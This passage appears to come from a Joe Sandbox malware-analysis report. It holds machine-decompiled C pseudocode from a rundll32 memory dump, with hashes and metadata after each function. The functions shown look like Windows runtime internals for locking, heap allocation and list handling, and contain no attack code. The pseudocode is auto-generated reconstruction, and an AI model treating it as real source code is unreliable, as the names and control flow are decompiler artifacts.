                                                                                                                					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                                                                                                                						E04409080(_t73, __ecx, __ecx, _t92);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t74 = 0;
                                                                                                                				_t96 =  *0x7ffe036a - 1;
                                                                                                                				_v12 = 0;
                                                                                                                				_v7 = 0;
                                                                                                                				if(_t96 > 0) {
                                                                                                                					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                                                                                                                					_v12 = _t74;
                                                                                                                					_v7 = _t96 != 0;
                                                                                                                				}
                                                                                                                				_t79 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v5 = 0;
                                                                                                                				while(1) {
                                                                                                                					L4:
                                                                                                                					_t59 = 1;
                                                                                                                					L5:
                                                                                                                					while(1) {
                                                                                                                						if(_t59 == 0) {
                                                                                                                							L12:
                                                                                                                							_t21 = _t90 + 4; // 0x77d0c21e
                                                                                                                							_t87 =  *_t21;
                                                                                                                							_v6 = 0;
                                                                                                                							if(_t79 != 0) {
                                                                                                                								if((_t87 & 0x00000002) != 0) {
                                                                                                                									goto L19;
                                                                                                                								}
                                                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                                                									_v6 = 1;
                                                                                                                									_t74 = _t87 ^ 0x00000003;
                                                                                                                								} else {
                                                                                                                									_t51 = _t87 - 2; // -2
                                                                                                                									_t74 = _t51;
                                                                                                                								}
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								if((_t87 & 0x00000001) != 0) {
                                                                                                                									_v6 = 1;
                                                                                                                									_t74 = _t87 ^ 0x00000001;
                                                                                                                								} else {
                                                                                                                									_t26 = _t87 - 4; // -4
                                                                                                                									_t74 = _t26;
                                                                                                                									if((_t74 & 0x00000002) == 0) {
                                                                                                                										_t74 = _t74 - 2;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L15:
                                                                                                                								if(_t74 == _t87) {
                                                                                                                									L19:
                                                                                                                									E04402D8A(_t74, _t90, _t87, _t90);
                                                                                                                									_t74 = _v12;
                                                                                                                									_v8 = 1;
                                                                                                                									if(_v7 != 0 && _t74 > 0x64) {
                                                                                                                										_t74 = _t74 - 1;
                                                                                                                										_v12 = _t74;
                                                                                                                									}
                                                                                                                									_t79 = _v5;
                                                                                                                									goto L4;
                                                                                                                								}
                                                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                                                								if(_t87 != _t87) {
                                                                                                                									_t74 = _v12;
                                                                                                                									_t59 = 0;
                                                                                                                									_t79 = _v5;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								if(_v6 != 0) {
                                                                                                                									_t74 = _v12;
                                                                                                                									L25:
                                                                                                                									if(_v7 != 0) {
                                                                                                                										if(_t74 < 0x7d0) {
                                                                                                                											if(_v8 == 0) {
                                                                                                                												_t74 = _t74 + 1;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										_t38 = _t90 + 0x14; // 0x0
                                                                                                                										_t39 = _t90 + 0x14; // 0x0
                                                                                                                										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                                                                                                                										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                                                											_t85 = _t85 & 0xff000000;
                                                                                                                										}
                                                                                                                										 *(_t90 + 0x14) = _t85;
                                                                                                                									}
                                                                                                                									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                									 *((intOrPtr*)(_t90 + 8)) = 1;
                                                                                                                									return 0;
                                                                                                                								}
                                                                                                                								_v5 = 1;
                                                                                                                								_t87 = _t74;
                                                                                                                								goto L19;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t94 = _t74;
                                                                                                                						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                                                                                                                						if(_t74 == 0) {
                                                                                                                							goto L12;
                                                                                                                						} else {
                                                                                                                							_t91 = _t90 + 4;
                                                                                                                							goto L8;
                                                                                                                							L9:
                                                                                                                							while((_t81 & 0x00000001) != 0) {
                                                                                                                								_t69 = _t81;
                                                                                                                								asm("lock cmpxchg [edi], edx");
                                                                                                                								if(_t69 != _t81) {
                                                                                                                									_t81 = _t69;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								_t90 = _v16;
                                                                                                                								goto L25;
                                                                                                                							}
                                                                                                                							asm("pause");
                                                                                                                							_t94 = _t94 - 1;
                                                                                                                							if(_t94 != 0) {
                                                                                                                								L8:
                                                                                                                								_t81 =  *_t91;
                                                                                                                								goto L9;
                                                                                                                							} else {
                                                                                                                								_t90 = _v16;
                                                                                                                								_t79 = _v5;
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}





























                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction ID: 6d93ae348558040f001dd9be18d935e3bbbe7b743d0b5f6d69d351b6650bf18c
                                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                                • Instruction Fuzzy Hash: 2E510434A04249EFDF20CF68C1907AFBBB1AF05314F2881AADD45973A1D375B98AD751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E044D740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                                                                                                                				signed short* _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _t55;
                                                                                                                				void* _t56;
                                                                                                                				intOrPtr* _t66;
                                                                                                                				intOrPtr* _t69;
                                                                                                                				void* _t74;
                                                                                                                				intOrPtr* _t78;
                                                                                                                				intOrPtr* _t81;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				intOrPtr _t83;
                                                                                                                				signed short* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr* _t90;
                                                                                                                				intOrPtr* _t93;
                                                                                                                				intOrPtr* _t94;
                                                                                                                				void* _t98;
                                                                                                                
                                                                                                                				_t84 = __edx;
                                                                                                                				_t80 = __ecx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t55 = __ecx;
                                                                                                                				_v8 = __edx;
                                                                                                                				_t87 =  *__edx & 0x0000ffff;
                                                                                                                				_v12 = __ecx;
                                                                                                                				_t3 = _t55 + 0x154; // 0x154
                                                                                                                				_t93 = _t3;
                                                                                                                				_t78 =  *_t93;
                                                                                                                				_t4 = _t87 + 2; // 0x2
                                                                                                                				_t56 = _t4;
                                                                                                                				while(_t78 != _t93) {
                                                                                                                					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                                                                                                                						L4:
                                                                                                                						_t78 =  *_t78;
                                                                                                                						continue;
                                                                                                                					} else {
                                                                                                                						_t7 = _t78 + 0x18; // 0x18
                                                                                                                						if(E0445D4F0(_t7, _t84[2], _t87) == _t87) {
                                                                                                                							_t40 = _t78 + 0xc; // 0xc
                                                                                                                							_t94 = _t40;
                                                                                                                							_t90 =  *_t94;
                                                                                                                							while(_t90 != _t94) {
                                                                                                                								_t41 = _t90 + 8; // 0x8
                                                                                                                								_t74 = E0444F380(_a4, _t41, 0x10);
                                                                                                                								_t98 = _t98 + 0xc;
                                                                                                                								if(_t74 != 0) {
                                                                                                                									_t90 =  *_t90;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L12;
                                                                                                                							}
                                                                                                                							_t82 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                                							if(_t82 != 0) {
                                                                                                                								_t46 = _t78 + 0xc; // 0xc
                                                                                                                								_t69 = _t46;
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								asm("movsd");
                                                                                                                								_t85 =  *_t69;
                                                                                                                								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                									L20:
                                                                                                                									_t82 = 3;
                                                                                                                									asm("int 0x29");
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t82 + 4)) = _t69;
                                                                                                                								 *_t82 = _t85;
                                                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t82;
                                                                                                                								 *_t69 = _t82;
                                                                                                                								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                                                                                                                								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                                                                                                                								goto L11;
                                                                                                                							} else {
                                                                                                                								L18:
                                                                                                                								_push(0xe);
                                                                                                                								_pop(0);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t84 = _v8;
                                                                                                                							_t9 = _t87 + 2; // 0x2
                                                                                                                							_t56 = _t9;
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L12:
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                				_t10 = _t87 + 0x1a; // 0x1a
                                                                                                                				_t78 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                                                                                                                				if(_t78 == 0) {
                                                                                                                					goto L18;
                                                                                                                				} else {
                                                                                                                					_t12 = _t87 + 2; // 0x2
                                                                                                                					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                                                                                                                					_t16 = _t78 + 0x18; // 0x18
                                                                                                                					E0444F3E0(_t16, _v8[2], _t87);
                                                                                                                					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                                                                                                                					_t19 = _t78 + 0xc; // 0xc
                                                                                                                					_t66 = _t19;
                                                                                                                					 *((intOrPtr*)(_t66 + 4)) = _t66;
                                                                                                                					 *_t66 = _t66;
                                                                                                                					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                                                                                                                					_t81 = L04424620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                                                                                                                					if(_t81 == 0) {
                                                                                                                						goto L18;
                                                                                                                					} else {
                                                                                                                						_t26 = _t78 + 0xc; // 0xc
                                                                                                                						_t69 = _t26;
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						_t85 =  *_t69;
                                                                                                                						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t81 + 4)) = _t69;
                                                                                                                							 *_t81 = _t85;
                                                                                                                							 *((intOrPtr*)(_t85 + 4)) = _t81;
                                                                                                                							 *_t69 = _t81;
                                                                                                                							_t83 = _v12;
                                                                                                                							 *(_t78 + 8) = 1;
                                                                                                                							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                                							_t34 = _t83 + 0x154; // 0x1ba
                                                                                                                							_t69 = _t34;
                                                                                                                							_t85 =  *_t69;
                                                                                                                							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                                                                                                                								goto L20;
                                                                                                                							} else {
                                                                                                                								 *_t78 = _t85;
                                                                                                                								 *((intOrPtr*)(_t78 + 4)) = _t69;
                                                                                                                								 *((intOrPtr*)(_t85 + 4)) = _t78;
                                                                                                                								 *_t69 = _t78;
                                                                                                                								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L12;
                                                                                                                			}






















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction ID: dc8db9b2b13b8c687bb01cde340b0bd5fd53fa36c0f786c15fceb1a306ba3fe3
                                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                                • Instruction Fuzzy Hash: 0C517A71600606EFDF26CF14C590A96BBB5FF45308F1480AAE9089F252E771FA46CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E04432990() {
                                                                                                                				signed int* _t62;
                                                                                                                				signed int _t64;
                                                                                                                				intOrPtr _t66;
                                                                                                                				signed short* _t69;
                                                                                                                				intOrPtr _t76;
                                                                                                                				signed short* _t79;
                                                                                                                				void* _t81;
                                                                                                                				signed int _t82;
                                                                                                                				signed short* _t83;
                                                                                                                				signed int _t87;
                                                                                                                				intOrPtr _t91;
                                                                                                                				void* _t98;
                                                                                                                				signed int _t99;
                                                                                                                				void* _t101;
                                                                                                                				signed int* _t102;
                                                                                                                				void* _t103;
                                                                                                                				void* _t104;
                                                                                                                				void* _t107;
                                                                                                                
                                                                                                                				_push(0x20);
                                                                                                                				_push(0x44dff00);
                                                                                                                				E0445D08C(_t81, _t98, _t101);
                                                                                                                				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                                                                				_t99 = 0;
                                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                                                                				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                                                                				if(_t82 == 0) {
                                                                                                                					_t62 = 0xc0000100;
                                                                                                                				} else {
                                                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                                                                					_t102 = 0xc0000100;
                                                                                                                					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                                                                					_t64 = 4;
                                                                                                                					while(1) {
                                                                                                                						 *(_t103 - 0x24) = _t64;
                                                                                                                						if(_t64 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t87 = _t64 * 0xc;
                                                                                                                						 *(_t103 - 0x2c) = _t87;
                                                                                                                						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x43e1664));
                                                                                                                						if(_t107 <= 0) {
                                                                                                                							if(_t107 == 0) {
                                                                                                                								_t79 = E0444E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x43e1668)), _t82);
                                                                                                                								_t104 = _t104 + 0xc;
                                                                                                                								__eflags = _t79;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t102 = E044851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x43e166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                                									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_t64 =  *(_t103 - 0x24);
                                                                                                                									goto L5;
                                                                                                                								}
                                                                                                                								goto L13;
                                                                                                                							} else {
                                                                                                                								L5:
                                                                                                                								_t64 = _t64 - 1;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                                					__eflags = _t102;
                                                                                                                					if(_t102 < 0) {
                                                                                                                						__eflags = _t102 - 0xc0000100;
                                                                                                                						if(_t102 == 0xc0000100) {
                                                                                                                							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                                							__eflags = _t83;
                                                                                                                							if(_t83 != 0) {
                                                                                                                								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                                                                								__eflags =  *_t83 - _t99;
                                                                                                                								if( *_t83 == _t99) {
                                                                                                                									_t102 = 0xc0000100;
                                                                                                                									goto L19;
                                                                                                                								} else {
                                                                                                                									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                                                                									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                                                                									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                                                                									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                                                                										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                                                                										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                                                                											L26:
                                                                                                                											_t102 = E04432AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                                                                											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                                											__eflags = _t102 - 0xc0000100;
                                                                                                                											if(_t102 != 0xc0000100) {
                                                                                                                												goto L12;
                                                                                                                											} else {
                                                                                                                												_t99 = 1;
                                                                                                                												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                                                                												goto L18;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_t69 = E04416600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                                                                											__eflags = _t69;
                                                                                                                											if(_t69 != 0) {
                                                                                                                												goto L26;
                                                                                                                											} else {
                                                                                                                												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                                                                												goto L18;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L18:
                                                                                                                										_t102 = E04432C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                                                                										L19:
                                                                                                                										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                                                                										goto L12;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L28:
                                                                                                                							} else {
                                                                                                                								E0441EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                                                								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                                                                								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                                                                								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                                                                								_t76 = E04432AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                                                                								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                                                                								__eflags = _t76 - 0xc0000100;
                                                                                                                								if(_t76 == 0xc0000100) {
                                                                                                                									 *((intOrPtr*)(_t103 - 0x1c)) = E04432C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                                                                								E04432ACB();
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L12:
                                                                                                                					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                                                                					_t62 = _t102;
                                                                                                                				}
                                                                                                                				L13:
                                                                                                                				return E0445D0D1(_t62);
                                                                                                                				goto L28;
                                                                                                                			}





















                                                                                                                0x04432ac6
                                                                                                                0x04432aab
                                                                                                                0x00000000
                                                                                                                0x04432a00
                                                                                                                0x04432a09
                                                                                                                0x04432a0e
                                                                                                                0x04432a21
                                                                                                                0x04432a24
                                                                                                                0x04432a35
                                                                                                                0x04432a3a
                                                                                                                0x04432a3d
                                                                                                                0x04432a42
                                                                                                                0x04432a59
                                                                                                                0x04432a59
                                                                                                                0x04432a5c
                                                                                                                0x04432a5f
                                                                                                                0x04432a5f
                                                                                                                0x044329fa
                                                                                                                0x044329f3
                                                                                                                0x04432a64
                                                                                                                0x04432a64
                                                                                                                0x04432a6b
                                                                                                                0x04432a6b
                                                                                                                0x04432a6d
                                                                                                                0x04432a72
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d43f87b3e81d7f9b5fa5fd4fde93ec5d223a1f619b54c2d0991979627eb2db4f
                                                                                                                • Instruction ID: c797526312bbe4a8ec6e108f4b665e0a69587c194e600725b6577084607a9885
                                                                                                                • Opcode Fuzzy Hash: d43f87b3e81d7f9b5fa5fd4fde93ec5d223a1f619b54c2d0991979627eb2db4f
                                                                                                                • Instruction Fuzzy Hash: CF515B71A00219EFEF25DF55C840ADEBBB5BF4CB14F14809AE801AB361D371A952DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E04434D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                				signed int _v12;
                                                                                                                				char _v176;
                                                                                                                				char _v177;
                                                                                                                				char _v184;
                                                                                                                				intOrPtr _v192;
                                                                                                                				intOrPtr _v196;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed short _t42;
                                                                                                                				char* _t44;
                                                                                                                				intOrPtr _t46;
                                                                                                                				intOrPtr _t50;
                                                                                                                				char* _t57;
                                                                                                                				intOrPtr _t59;
                                                                                                                				intOrPtr _t67;
                                                                                                                				signed int _t69;
                                                                                                                
                                                                                                                				_t64 = __edx;
                                                                                                                				_v12 =  *0x44fd360 ^ _t69;
                                                                                                                				_t65 = 0xa0;
                                                                                                                				_v196 = __edx;
                                                                                                                				_v177 = 0;
                                                                                                                				_t67 = __ecx;
                                                                                                                				_v192 = __ecx;
                                                                                                                				E0444FA60( &_v176, 0, 0xa0);
                                                                                                                				_t57 =  &_v176;
                                                                                                                				_t59 = 0xa0;
                                                                                                                				if( *0x44f7bc8 != 0) {
                                                                                                                					L3:
                                                                                                                					while(1) {
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						_t67 = _v192;
                                                                                                                						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                                                                                                                						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                                                                                                                						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                                                                                                                						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                                                                                                                						_push( &_v184);
                                                                                                                						_push(_t59);
                                                                                                                						_push(_t57);
                                                                                                                						_push(0xa0);
                                                                                                                						_push(_t57);
                                                                                                                						_push(0xf);
                                                                                                                						_t42 = E0444B0B0();
                                                                                                                						if(_t42 != 0xc0000023) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						if(_v177 != 0) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                                						}
                                                                                                                						_v177 = 1;
                                                                                                                						_t44 = L04424620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                                                                                                                						_t59 = _v184;
                                                                                                                						_t57 = _t44;
                                                                                                                						if(_t57 != 0) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							_t42 = 0xc0000017;
                                                                                                                							break;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(_t42 != 0) {
                                                                                                                						_t65 = E0440CCC0(_t42);
                                                                                                                						if(_t65 != 0) {
                                                                                                                							L10:
                                                                                                                							if(_v177 != 0) {
                                                                                                                								if(_t57 != 0) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t46 = _t65;
                                                                                                                							L12:
                                                                                                                							return E0444B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                                                                                                						}
                                                                                                                						L7:
                                                                                                                						_t50 = _a4;
                                                                                                                						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                                                                                                						if(_t50 != 3) {
                                                                                                                							if(_t50 == 2) {
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                							L9:
                                                                                                                							if(E0444F380(_t67 + 0xc, 0x43e5138, 0x10) == 0) {
                                                                                                                								 *0x44f60d8 = _t67;
                                                                                                                							}
                                                                                                                							goto L10;
                                                                                                                						}
                                                                                                                						L8:
                                                                                                                						_t64 = _t57 + 0x28;
                                                                                                                						E04434F49(_t67, _t57 + 0x28);
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t65 = 0;
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				if(E04434E70(0x44f86b0, 0x4435690, 0, 0) != 0) {
                                                                                                                					_t46 = E0440CCC0(_t56);
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					_t59 = 0xa0;
                                                                                                                					goto L3;
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67097470e51a3b81c999bb962990579c18b8bb57cc82e7064b9428b9c34c2d7a
                                                                                                                • Instruction ID: c9d1beb151a65288252da8d4d5ade7adecb0e418fd37bc10d751fac77d5a020d
                                                                                                                • Opcode Fuzzy Hash: 67097470e51a3b81c999bb962990579c18b8bb57cc82e7064b9428b9c34c2d7a
                                                                                                                • Instruction Fuzzy Hash: 5C41A071A40318AFFF21DF15CD81BABB7AAEB48B14F04409BE94997381DB74FD448A91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E04434BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v156;
                                                                                                                				short _v158;
                                                                                                                				intOrPtr _v160;
                                                                                                                				char _v164;
                                                                                                                				intOrPtr _v168;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t45;
                                                                                                                				intOrPtr _t74;
                                                                                                                				signed char _t77;
                                                                                                                				intOrPtr _t84;
                                                                                                                				char* _t85;
                                                                                                                				void* _t86;
                                                                                                                				intOrPtr _t87;
                                                                                                                				signed short _t88;
                                                                                                                				signed int _t89;
                                                                                                                
                                                                                                                				_t83 = __edx;
                                                                                                                				_v8 =  *0x44fd360 ^ _t89;
                                                                                                                				_t45 = _a8 & 0x0000ffff;
                                                                                                                				_v158 = __edx;
                                                                                                                				_v168 = __ecx;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					L22:
                                                                                                                					_t86 = 6;
                                                                                                                					L12:
                                                                                                                					E0440CC50(_t86);
                                                                                                                					L11:
                                                                                                                					return E0444B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                                                                                                                				}
                                                                                                                				_t77 = _a4;
                                                                                                                				if((_t77 & 0x00000001) != 0) {
                                                                                                                					goto L22;
                                                                                                                				}
                                                                                                                				_t8 = _t77 + 0x34; // 0xdce0ba00
                                                                                                                				if(_t45 !=  *_t8) {
                                                                                                                					goto L22;
                                                                                                                				}
                                                                                                                				_t9 = _t77 + 0x24; // 0x44f8504
                                                                                                                				E04422280(_t9, _t9);
                                                                                                                				_t87 = 0x78;
